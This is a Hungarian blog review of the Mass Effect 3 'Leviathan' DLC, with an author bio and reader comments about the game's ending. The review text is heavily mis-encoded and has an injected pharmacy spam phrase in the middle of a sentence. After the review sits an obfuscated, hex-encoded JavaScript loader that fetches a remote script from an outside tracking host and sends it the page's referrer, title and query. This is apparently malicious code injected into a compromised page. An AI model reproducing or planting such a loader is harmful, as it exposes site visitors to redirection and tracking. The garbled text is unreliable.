Leviathan DLC teszt

MegA�rkezett az elsA� singple player DLC a Mass Effect 3-hoz, amiben egy, a sorozatban rA�gA?ta emlegetett rejtA�ly, a Leviathan of DisA�nyomA?ba eredhetA?nk, A�s kiderA�thetjA?k a legenda mA�gA�tt rejlA� igazsA?got. Shepard parancsnok A�rdeklA�dA�sA�t kA�nnyen felcsigA?zza az a tA�ny, hogy A?gy tA�nik, a Leviathan kA�pes minden kA?lA�nA�sebb gond nA�lkA?l lelA�ni a Reapereket – a nyomozA?s vA�gA�re rA?adA?sul megismerheti a KaszA?sok hA?ttA�rtA�rtA�netA�t is. Hogy mennyire rA?hellem a Mass Effect 3 befejezA�sA�t, az nem titok – ennek ellenA�re A?gy-ahogy A�lveztem a Leviathant, ami valA?jA?ban egy tA�nyleg viszonylag tisztessA�gesen A�sszerakott kiegA�szA�tA�je a jA?tA�knak. A DLC hA?rom fA�bb kA?ldetA�sbA�l A?ll, nagyjA?bA?l kA�t A?ra alatt ki is jA?tszhatA? az egA�sz.

A kA?ldetA�seket egy kimondottan jA?pofA?ra sikerA?lt nyomozgatA?s vezeti be: egy, a FellegvA?rba berakott A?j helyszA�nen, egy tudomA?nyos laborban kell alaposabban szA�tnA�znA?nk, A�s ott begyA�jtenA?nk a nyomokat, amik majd elvezethetnek a megfelelA� naprendszerbe – ahol remA�lhetA�leg majd felvehetjA?k valami A?ton-mA?don a kapcsolatot a Leviathannal. A laborban valA? nA�zelA�dA�s a Lair of the Shadow BrokerA�DLC-t idA�zi, ahol ugyebA?r Liara cuccai kA�zA�tt kellett szA�tnA�znA?nk – de annA?l egy fokkal A�sszetettebb a dolog. Nem csak simA?n kihA?zkodjuk a fiA?kokat, hA?tha talA?lunk egy cetlit a kA�vetkezA� helyszA�n koordinA?tA?ival: EDI segA�tsA�gA�vel A�ssze is kell vetnA?nk a kA?lA�nbA�zA� begyA�jtA�tt informA?ciA?kat, A�s leszA�kA�tenA?nk a potenciA?lis naprendszerek listA?jA?t. SzA?val, jA?pofa a dolog, legalA?bbis elsA� vA�gigjA?tszA?sra nekem bejA�tt a nyomozA?s szA?l. Nagy kA�rdA�s, hogy mA?sodik, harmadik, negyedik vA�gigjA?tszA?sra is ilyen jA?pofA?nak fog-e hatni, vagy mA?r unalmassA? vA?lik a dolog. ValA?szA�nA�leg olyan A�rzA�sem lesz, mintha egy mA?r megfejtett keresztrejtvA�nyt akarnA�k kisatA�rozni A�s A?jra megoldani A?gy, hogy azA�rt halvA?nyan ottmaradtak a ceruzanyomok is.

Egy DLC persze nem csak a nyomozA?srA?l, hanem az akciA?rA?l is kell, hogy szA?ljon – A�s ebben is tisztessA�geset alkottak a fiA?k-lA?nyok. A teljes ME3 legjobb pA?lyA?i kA�zA� sorolhatA?ak a Leviathan csatA?i: jA?t tesz ezeknek az is, hogy A?tvettek elemeket a multiplayerbA�l is, A?gymint a drA?nkA�sA�rgetA�s A�s a “csomagkiszA?llA�tA?s”, A�gy nem csak natA?rban kell lA�vA�ldA�zni, hanem van egyA�b cA�l is. Asj ellenfA�l nincs a jA?tA�kban, hagyomA?nyos Reaper erA�k prA?bA?lnak megakadA?lyozni minket a Leviathan megtalA?lA?sA?ban – aki gyakran multizik, az nem nagyon fog beleizzadni a harcokba. Bossfightra ne szA?mA�tsunk, mert nincs a DLC-ben ilyen – de a kemA�nyebb ellenfelek, mint a Brute-ok A�s Banshee-k hajlamosak pA?rosA?val jA�nni, mivel pA?rosan szA�p az A�let. JellemzA� mA?don az egyik pA?lyA?n sikerA?lt fast valtrex delivery. azutA?n megtalA?lnom a Banshee-k lelA�vA�sA�re odahelyezett rakA�tavetA�t, miutA?n nA�hA?ny biotikus robbanA?ssal lerendeztem A�ket – hiA?ba no, dolgoznak a multis reflexek, egy ilyen csatA?t meg kell tudni oldani rakA�ta nA�lkA?l is. 🙂

A tA�rtA�net szintA�n kimondottan jA?, szA�pen felvezetik a nyomozA?st, A�s tA�nyleg elA�g sok infA?t megtudunk a Reaperek eredetA�rA�l – habA?r nem annyiraA�megdA�bbentA� ez az A?j tudA?s a befejezA�s ismeretA�ben. A hangulat kicsit nyomasztA? – de leginkA?bb a Mass Effect 1 hangulatA?ra hajaz. SikerA?lt visszahozni azt az A�rzA�st, amikor mA�g szinte semmit nem tudtunk a ReaperekrA�l, csak azt, hogy idegenek, fA�lelmetesek, A�s belA?thatatlan hatalmuk van – nos, ugyanez jellemzA� a Leviathanra is. A Mass Effect 2-es DLC-k kapcsA?n felmerA?lt legnagyobb kritikA?t is most kikerA?lte a Bioware: a Leviathanra valamennyi csapattA?rsunk szinkonhangjA?t visszahoztA?k, mindenkinek van sajA?t szA�vege a DLC-ben. EDI-nek mA�g tA�bb is, hiszen a laboros nyomkeresA�sben A� a mi kis szintetikus Dr. Watsonunk, aki segA�t A�sszerakni a kA�pet.

A sztori A�s a hangulat tehA?t szintA�n jA? – az egyetlen problA�ma az ismA�telten csak a Mass Effect 3 vA�gjA?tA�ka. Akinek nem tetszett a trilA?gia lezA?rA?sa, az meglehetA�sen alulmotivA?lt lesz a Leviathan vA�gigjA?tszA?sa kapcsA?n: minek vele vacakolni, amikor A�gy is, A?gy is ugyanabbA?l az elcseszett 3+1 befejezA�sbA�l fogunk tudni vA?lasztani? A befejezA�sen rA?adA?sul mA�g egy fokot ront is a Leviathan – a ReaperekrA�l megtudott informA?ciA?k tA?krA�ben, ha lehetsA�ges, mA�g kevA�sbA� hajlamos megbA�zni az ember a Catalystban. A vA�gsA� beszA�lgetA�s egyA�bkA�nt minimA?lisan, de vA?ltozik attA?l fA?ggA�en, hogy megcsinA?ltuk-e a Leviathan DLC-t – ez azonban egy-kA�t mondatot jelent csak, A�s A�rtelemszerA�en a vA�gsA� opciA?kon nem mA?dosA�t.

Akinek tetszett a Mass Effect 3 vA�ge, vagy legalA?bbis elfogadta azt, esetleg sikeresen tA?ltette magA?t rajta, annak bA?tran ajA?nlom a Leviathant. A�rdekes, izgalmas kiegA�szA�tA�, a Mass Effect DLC-k sorA?nak egyik legjobb darabja.

 var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Szerző:

Merras

A Miyazaki Jun nem álnév, echte original japán importárú vagyok apai részről. Amikor épp nem valami sci-fi honlapot hegesztek, vagy rendezvényt csinálok, akkor kénytelen vagyok dolgozni, ennek kapcsán online marketing tanácsadóként tevékenykedem.

424 thoughts on “Leviathan DLC teszt”

  1. Nekem annyira nem jött be sajnos. Túl sok volt az unalmas oda-vissza repülgetés a laborba. Ráadásul szerintem szinte semmi újat nem tudtunk meg, hiszen a Chil már elmondott majdnem mindent. Az lett volna jó, ha ez alapból benne lett volna a játékban, mert akkor érezhető lett volna, hogy rendesen elő van készítve a Child érkezése, nem csak úgy egyik pillanatból a másikba jelenik meg, mi meg nézünk mit a moziba, hogy ez miez?! Plusz milyen nagy kihagyott ziccer, hogy nincs harc a víz alatt!

  2. Engem a bugok bosszantottak. Az egyik pályán alig lehet lejutni egy létrán, egy másikon Shepard átképezte magát Supermanná, néhol, ahol meg át kéne ugrani, nem lehet akárhol… 🙁
    De ezt leszámítva nagyon bejött. A keresgélés nekem második nekifutásra is tetszett, bár mivel először félálomba játszottam végig, így másodikra figyeltem inkább oda, olyan volt, mintha először játszanám. 😀 Azért trükkösek a Bioware fiúk-lányok, mert voltaképpen egyetlen nyomot elég megtalálni, és máris mehetünk a dolgunkra, így aki később nem akar minden szart átnézni, annak nem kell tökölnie.
    A Kaszásokról mondjuk tényleg nem tudunk meg sok újat (lehetett volna még egyáltalán?), de jó volt megismerni a múltjukat. Honnan van a formájuk, kik és miért jutottak arra az elhatározásra, hogy megalkossák CsillagFütyit (aki mellesleg elő van készítve, hisz már Thessián konkretizálja Vendetta, hogy van valami, ami irányítja a Kaszásokat). Szerencsére ebben a beszélgetésben sem rejtik véka alá, hogy iszonyúra melléfogtak Leviék ezzel az akármivel (noha az tényleg azt teszi, ami a dolga). Ez van, sok balfasz van a Mass Effect univerzumában, most még egy betársult a quarianok, a Cerberus, a Tanács és a többiek mellé. De hát ha mindenki gondolkodna, Shepardnak mi dolga maradna. 😀
    Külön öröm, hogy a csapattársak ezúttal tényleg nem voltak némák. Ezt nagyon rühelltem az ME2 DLC-iben, Bár félek, hogy ez nem egy új tendencia, hanem csak kihasználták, hogy az EC DLC-re amúgy is be kellett rendelni majdnem mindenkit, így egy füst alatt ezt is lerendezték. Mert például Joker egy szót sem szól, ugyanúgy, mint az EC-ben, ergo Seth Greent nem hívták vissza, ezért nem szerepel itt sem. De ne legyen igazam (egyszer a változatosság kedvéért 😎 ).
    Ami még kicsit megtörte a mosolyom, hogy vártam volna a végére valami epikusat. Erre egy snassz energiahullámmal le lett tudva még az az egy Kaszás is. Pedig egy egy-egy elleni harc, vagy egy Leviathan-Kaszás beszélgetés, valami hasonló még adott volna valami pluszt.
    Ja, és ez még mindig a harmadik single DLC, nem az első. 😉

  3. Nekem ez az első DLC.

    Az Extended Cut az szvsz egy közepes bugfix, ami pont a fő problémát nem javította, és valszeg egy jelentős része amúgy is olyan, amit már elkészítettek, csak időhiány miatt nem került bele a játékba eredetileg. Az ilyen extra fegyver / extra bizbasz meg nekem nem SP DLC. 😀

    1. Hát attól, hogy neked mi, az egy dolog, de attól ez a valóságban a harmadik SP DLC. Pláne, hogy ott a From Ashes is, ami azért nem csak extra puska, extra bizbasz, bár Javik belefér a bizbasz kategóriába. 🙂

      Az ízlésedet meg semmilyen bugfix, DLC, patch, expansio, nem tudja kijavítani. 😛 Bár lehet, hogy egy üveg pálinka igen. Akkor CsillagTöki még élőben is megjelenhet akár. Az de komoly lenne. 😆

    1. Mivel elárulta a Leviathanokat, így megteheti velünk is a nyájas beszéd ellenére. Illetve, hogy látszólag a kezünkbe adja a végső döntést.

  4. Egy újabb negatív utalás a Mass Effect 3 végére. Kérem szépen, a Mass Effect-et szerény véleményem szerint a végkifejlet teljesen a magas sci-fi műfajába emeli. Mindegyik végjátékban van dráma és áldozat, és a tragédia mellett tanulság és remény is. Még nem volt alkalmam az Extended Cut befejezésére, de két (rövid) véget láttam, a Denial és a Destroy endinget. A Mass Effect hozzányúl néhány olyan mély kérdéshez, ami az igazi, komoly science fiction lényegét adja, és a játékosra hagyja, hogy válaszoljon rájuk. Ez az első komoly játék, ami utoléri a sci-fi irodalom színvonalát, Az első interaktív eposz, ami teljesen képes bevonni és újat tanítani nekünk. A Mass Effect 3 végéhez fel kell nőni, ez az én véleményem.

Hozzászólások lehetősége itt nem engedélyezett.